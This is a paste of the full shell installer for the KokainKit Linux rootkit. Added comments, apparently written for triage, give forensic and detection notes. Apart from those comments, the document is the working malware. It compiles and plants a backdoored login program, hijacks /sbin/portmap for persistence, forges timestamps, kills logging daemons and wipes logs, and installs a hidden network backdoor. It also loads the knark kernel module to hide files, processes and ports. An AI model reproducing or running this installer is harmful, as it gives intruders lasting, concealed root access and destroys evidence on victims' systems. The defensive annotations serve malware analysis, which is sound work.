FlyFar

Backdoor.Linux.Kokain - Source Code

Jun 12th, 2023
  1. #!/bin/sh
  2.  
  3. # KokainKit v1.6 by deka
  4. # -
  5. # A rootkit based on knark and cobolt.
  6. # Do not Distribute!
  7. # -
  8.  
  # Installer parameters. $1 (the "magic word" in the banner below) names the install
  # directory under /usr/lib, and $2 is the port later patched into the bundled
  # "dittrich" binary. TORNDIR is a fixed path that the script checks for further down.
  # Triage note: THEDIR differs per install, so there is no fixed-path indicator for it.
  # Hunt on the layout this script creates under one /usr/lib subdirectory instead:
  # login1, login2, portmap, autoexec, .bashrc, dittrich, stuff/ and knrk/.
  9. TORNDIR=/usr/src/.puta
  10. THEPASS=$1
  11. DITTPORT=$2
  12. THEDIR=/usr/lib/$THEPASS
  13.  
  # Operator-facing banner, written to stdout only. The literal strings are usable as
  # static signatures for the installer script itself (e.g. in a recovered archive);
  # nothing here is written to disk on the target.
  14. echo "---------------------------------------"
  15. echo "       KokainKit v1.6 by dekah&self"
  16. echo "---------------------------------------"
  17. echo ""
  18. echo "Using magic word $THEPASS and dittrichport $DITTPORT."
  19. echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
  20.  
  # Exits unless whoami reports root. Every later step writes to root-owned locations
  # (/usr/lib, /sbin, /bin, /var/log, /etc), so this kit is a post-compromise tool:
  # finding it installed means root was already obtained by some other means.
  21. if ! test "$(whoami)" = "root"; then
  22.   echo "  - UID0 check failed"
  23.   echo ""
  24.   sleep 3
  25.   echo "FATAL: You're not root"
  26.   exit 1
  27. fi
  28.  
  # Runs only if the T0rnKit directory ($TORNDIR) already exists, i.e. on a host that
  # was compromised before. It kills in.inetd and t0rntd, overwrites /etc/ttyhash and
  # /usr/sbin/in.inetd, and rewrites four dot-files inside $TORNDIR.
  # Forensic note: on such a host the earlier kit's files no longer hold what the first
  # intruder configured, and their mtimes reflect this installer's run.
  # NOTE(review): the purpose of .1file/.1addr/.1logz/.1proc is not visible here;
  # presumably they are T0rnKit's hide lists. Confirm against a T0rnKit analysis.
  29. if test -d "$TORNDIR"; then
  30.   echo "  - T0rnKit found. Screwing it up"
  31.   killall -9 in.inetd
  32.   killall -9 t0rntd
  33.   echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
  34.   echo "" > /usr/sbin/in.inetd
  35.   echo "ap" > $TORNDIR/.1file
  36.   echo "255.255" > $TORNDIR/.1addr
  37.   echo "255.255" > $TORNDIR/.1logz
  38.   echo "ap" > $TORNDIR/.1proc
  39. fi
  40.  
  # Creates /usr/include if it is missing. Nothing else in this script writes there;
  # presumably the compile steps below need it. Not confirmed by the visible code.
  41. if ! test -d "/usr/include"; then
  42.   echo "  - /usr/include does not exist, making it (ugly)..."
  43.   mkdir /usr/include
  44. fi
  45.  
  # Creates /usr/include/pwdb if it is missing. On a host with no package that owns this
  # directory, an empty /usr/include/pwdb whose timestamps match the other artefacts
  # is a weak corroborating indicator. Presumably a bundled source expects it (not shown).
  46. if ! test -d "/usr/include/pwdb"; then
  47.   echo "  - /usr/include/pwdb does not exist, making it (ugly)..."
  48.   mkdir /usr/include/pwdb
  49. fi
  50.  
  # Creates the install directory /usr/lib/<$1> and aborts if it does not exist
  # afterwards. Detection: a /usr/lib subdirectory that no package owns is worth
  # inspecting. The autoexec script assembled later asks the kernel module to hide this
  # path, so enumerate /usr/lib from an offline image or trusted boot media rather than
  # from the running system.
  51. mkdir $THEDIR
  52. if test -d "$THEDIR"; then
  53.   echo "  - Secret dir created"
  54. else
  55.   echo "  - MkDir failed"
  56.   echo ""
  57.   echo "FATAL: Unable to create the secret directory"
  58.   exit 1
  59. fi
  60.  
  # Generates src/kokain.h holding the magic word and the install directory as C string
  # constants, just before the gcc steps that follow.
  # NOTE(review): presumably cobolt.c and/or autoexec.c include this header, in which
  # case both values appear as plain strings in the compiled binaries and can be
  # recovered from a suspect /bin/login or /sbin/portmap. The C sources are not shown.
  61. cd src
  62. echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
  63. echo "#define MAGIC_DIR  \"$THEDIR\"" >> kokain.h
  64.  
  # Builds the replacement login program ("cobolt") on the target and stages it.
  # Prerequisite worth noting for hardening: this step needs a working gcc on the host.
  65. gcc -O2 cobolt.c -o cobolt
  66. if test -r "./cobolt"; then
  67.   echo "  - Cobolt compiled"
  68. else
  69.   echo "  - gcc failed"
  70.   echo ""
  71.   cd ..
  72.   sleep 3
  73.   echo "FATAL: Unable to compile Cobolt"
  74.   exit 1
  75. fi
  # Timestamp forgery: copies the access and modification times of the genuine
  # /bin/login onto the new binary, so atime/mtime are not evidence for this file.
  # touch cannot set ctime; compare content hashes against the package database or
  # known-good media instead.
  76. touch -acmr /bin/login cobolt
  # login1 = copy of the genuine /bin/login, login2 = the replacement. /bin/login itself
  # is not overwritten here; the autoexec line that calls knrkered references it, and the
  # final fallback at the end of the script copies login2 over it.
  77. cp /bin/login $THEDIR/login1
  78. cp cobolt $THEDIR/login2
  79. echo "  - Cobolt installed"
  80.  
  # Builds the "autoexec" helper binary from src/autoexec.c and aborts if no readable
  # output file exists. The next section installs this binary in place of /sbin/portmap.
  81. gcc -O2 autoexec.c -o autoexec
  82. if test -r "./autoexec"; then
  83.   echo "  - AutoExec compiled"
  84. else
  85.   echo "  - gcc failed"
  86.   echo ""
  87.   cd ..
  88.   echo "FATAL: Unable to compile AutoExec"
  89.   exit 1
  90. fi
  91.  
  # Persistence: the genuine /sbin/portmap is saved to $THEDIR/portmap and replaced by
  # the autoexec binary, whose atime/mtime are first forged to match the original.
  # Whatever boot script normally starts portmap now starts the kit's binary instead.
  # NOTE(review): presumably that binary runs the $THEDIR/autoexec script and then the
  # saved portmap so RPC services keep working. autoexec.c is not shown; confirm.
  # Detection: verify /sbin/portmap against the package database or a known-good hash
  # (timestamps will match, content will not), and look for a second portmap binary
  # outside /sbin.
  92. touch -acmr /sbin/portmap autoexec
  93. cp /sbin/portmap $THEDIR/portmap
  94. rm -f /sbin/portmap
  95. cp autoexec /sbin/portmap
  # Starts the $THEDIR/autoexec shell script; later sections append commands to it.
  96. echo "#!/bin/sh" > $THEDIR/autoexec
  97. echo "  - AutoExec installed"
  98. cd ..
  99.  
  # Log tampering. syslogd and klogd are killed with SIGKILL (they are restarted near the
  # end of the script), a bundled ./wipe tool is run with "u root", and the current
  # /var/log/messages and /var/log/secure are deleted and replaced by rotated copies
  # (.1, then .0 if present).
  # NOTE(review): ./wipe is not shown; presumably it removes root's entries from the
  # login accounting files. Confirm against the binary.
  # Detection: a gap in local syslog covering the install window; current logs whose
  # content duplicates a rotated file; new inodes for both log files. Logs forwarded
  # to a remote collector are unaffected by this block and show the daemon stop/start.
  100. killall -9 syslogd klogd
  101. ./wipe u root >/dev/null 2>&1
  102. rm -f /var/log/messages /var/log/secure
  103. cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
  104. cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
  105. cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
  106. cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
  107. echo "  - Logs cleaned"
  108.  
  # The three commented-out lines would have emptied the TCP-wrapper files; they are
  # disabled in this version, so hosts.allow/hosts.deny are left as found.
  109. #echo "" > /etc/hosts.allow
  110. #echo "" > /etc/hosts.deny
  111. #echo "  - Hosts.deny/Hosts.allow cleaned"
  112. echo "  - Patching dittrich..."
  # Passes the placeholder __PATCHPort__ and the operator's port ($2) to the bundled
  # ./bpatch tool, applied to the prebuilt ./dittrich binary.
  # NOTE(review): presumably bpatch replaces the placeholder in place and dittrich is
  # the network listener; if so, an unpatched sample still contains the literal string
  # __PATCHPort__, which makes a useful static signature. Neither tool is shown.
  113. ./bpatch ./dittrich __PATCHPort__ $DITTPORT
  114.  
  # Appends a shell profile to $THEDIR/.bashrc. The heredoc delimiter is unquoted, so
  # $THEDIR is expanded at install time and the file on disk contains the real install
  # path twice in its PATH line ($THEDIR and $THEDIR/stuff).
  # Detection: a .bashrc under /usr/lib, or any profile whose PATH ends in a /usr/lib
  # subdirectory plus "/stuff", points directly at the install directory.
  115. cat <<E0F>> $THEDIR/.bashrc
  116. alias ls="ls --color -alF"
  117. alias dir="dir --color"
  118. export PS1="\u@\h:\w# "
  119. export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
  120. cd
  121. E0F
  122. echo "  - .bashrc created"
  123.  
  # Copies the patched dittrich binary and the bundled "stuff" directory into $THEDIR.
  # The contents of stuff/ are not visible in this script.
  124. cp -R dittrich stuff $THEDIR
  125. echo "  - Stuff installed"
  126.  
  # Builds the bundled knark component with make, deletes its source and Makefile, and
  # copies what remains into $THEDIR/knrk.
  127. mkdir $THEDIR/knrk
  128. cd knark
  129. make >/dev/null 2>&1
  130. echo "  - Knark compiled"
  131. cd ..
  132. rm -rf knark/knrksrc knark/Makefile
  133. cp -R knark/* $THEDIR/knrk
  # The lines below append the boot-time sequence to $THEDIR/autoexec. Read as a
  # behaviour list for triage: two kernel objects are force-loaded with insmod -f, then
  # helper programs are called with the install directory, with /bin/login paired with
  # login2, and with the hex form of the port; finally dittrich is started and signal 31
  # is sent to it.
  # NOTE(review): going by the helper names, these hide the directory (knrkhidef),
  # redirect execution of /bin/login to login2 (knrkered), hide the listening port
  # (knrknethide) and hide the dittrich process (signal 31). The helpers are not
  # shown, so confirm against a knark analysis.
  # Detection: once the module is loaded, ls/ps/netstat/lsmod on the host cannot be
  # trusted. Compare an external port scan with local netstat output, and examine the
  # disk from an offline image or trusted boot media. /bin/login can hash clean on disk
  # while a different binary executes.
  # Hardening: a kernel that refuses runtime module loading stops the two insmod steps.
  134. echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
  135. echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
  136. echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
  137. echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
  138. echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
  139. echo "$THEDIR/dittrich" >> $THEDIR/autoexec
  140. echo "killall -31 dittrich" >> $THEDIR/autoexec
  141.  
  # Runs the replaced /sbin/portmap immediately with output discarded, so the kit is
  # activated during installation rather than at the next boot.
  # Forensic note: the timing of a portmap start outside the normal boot sequence can
  # help bound the install window if process accounting or remote logs exist.
  142. /sbin/portmap >/dev/null 2>&1
  143. echo "  - Knark installed"
  144.  
  # Deletes /var/named/ADMROCKS if it exists.
  # NOTE(review): presumably this directory is a leftover from the exploit used for
  # initial access or from another intruder; this script does not show which.
  # Forensic note: the absence of that directory therefore says nothing about whether
  # the name server was the entry point; check named's version and logs independently.
  145. if test -d "/var/named/ADMROCKS"; then
  146.   rm -rf /var/named/ADMROCKS
  147.   echo "  - AdmRocks erased"
  148. fi
  149.  
  # Rewrites /etc/inetd.conf without any line containing "2222", going through the
  # fixed temporary file /tmp/blahah.
  # NOTE(review): presumably this removes an inetd entry added by an earlier exploit or
  # intruder; the script does not say what the entry was.
  # Forensic note: inetd.conf gets a new inode and fresh timestamps, and its ownership
  # and mode become whatever cp produces, so compare it with backups or the package
  # default. A stray /tmp/blahah means the script was interrupted at this step.
  150. cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
  151. rm -f /etc/inetd.conf
  152. cp /tmp/blahah /etc/inetd.conf
  153. rm -f /tmp/blahah
  154. echo "  - Inetd.conf fixed"
  155.  
  # Restarts the logging daemons killed earlier, so logging resumes after the install
  # window. The stop/start pair is itself visible in remote logs or in the restored
  # local files.
  156. PATH=/sbin:$PATH
  157. syslogd
  158. klogd
  159. echo "  - Syslogd/Klogd restarted"
  # Self-cleanup: moves to the parent directory and deletes everything whose name
  # contains "kokain", which removes the unpacked installer tree. The sources will not
  # be found in place afterwards; recovery depends on unallocated-space carving,
  # backups or network captures of the transfer.
  160. cd ..
  161. rm -rf *kokain*
  162. echo "  - KokainKit removed"
  163.  
  # Final status check. The script treats the existence of a /proc/<magic word>
  # directory as proof that the kernel module is active.
  # NOTE(review): presumably knark registers a /proc entry named after the value built
  # in via kokain.h; the module source is not shown. If so, an unexpected non-numeric
  # directory under /proc is a live indicator, visible only when its name is known.
  164. echo ""
  165. #echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
  166. if test -d "/proc/$THEPASS";
  167. then
  168.   echo "Knark installed successfully."
  169. else
  # Fallback when the module did not load: the replacement login is copied directly
  # over /bin/login. In this case the change is visible on disk and package
  # verification or a hash comparison of /bin/login detects it. The genuine binary is
  # still available as $THEDIR/login1 for comparison.
  170.   echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
  171.   cp $THEDIR/login2 /bin/login
  172. fi
  # Echoes the magic word and port back to the operator's terminal. Captured session
  # logs or terminal scrollback containing "kitinst" therefore reveal both values.
  173. echo "kitinst $THEPASS $DITTPORT"
  174. # - EoF - #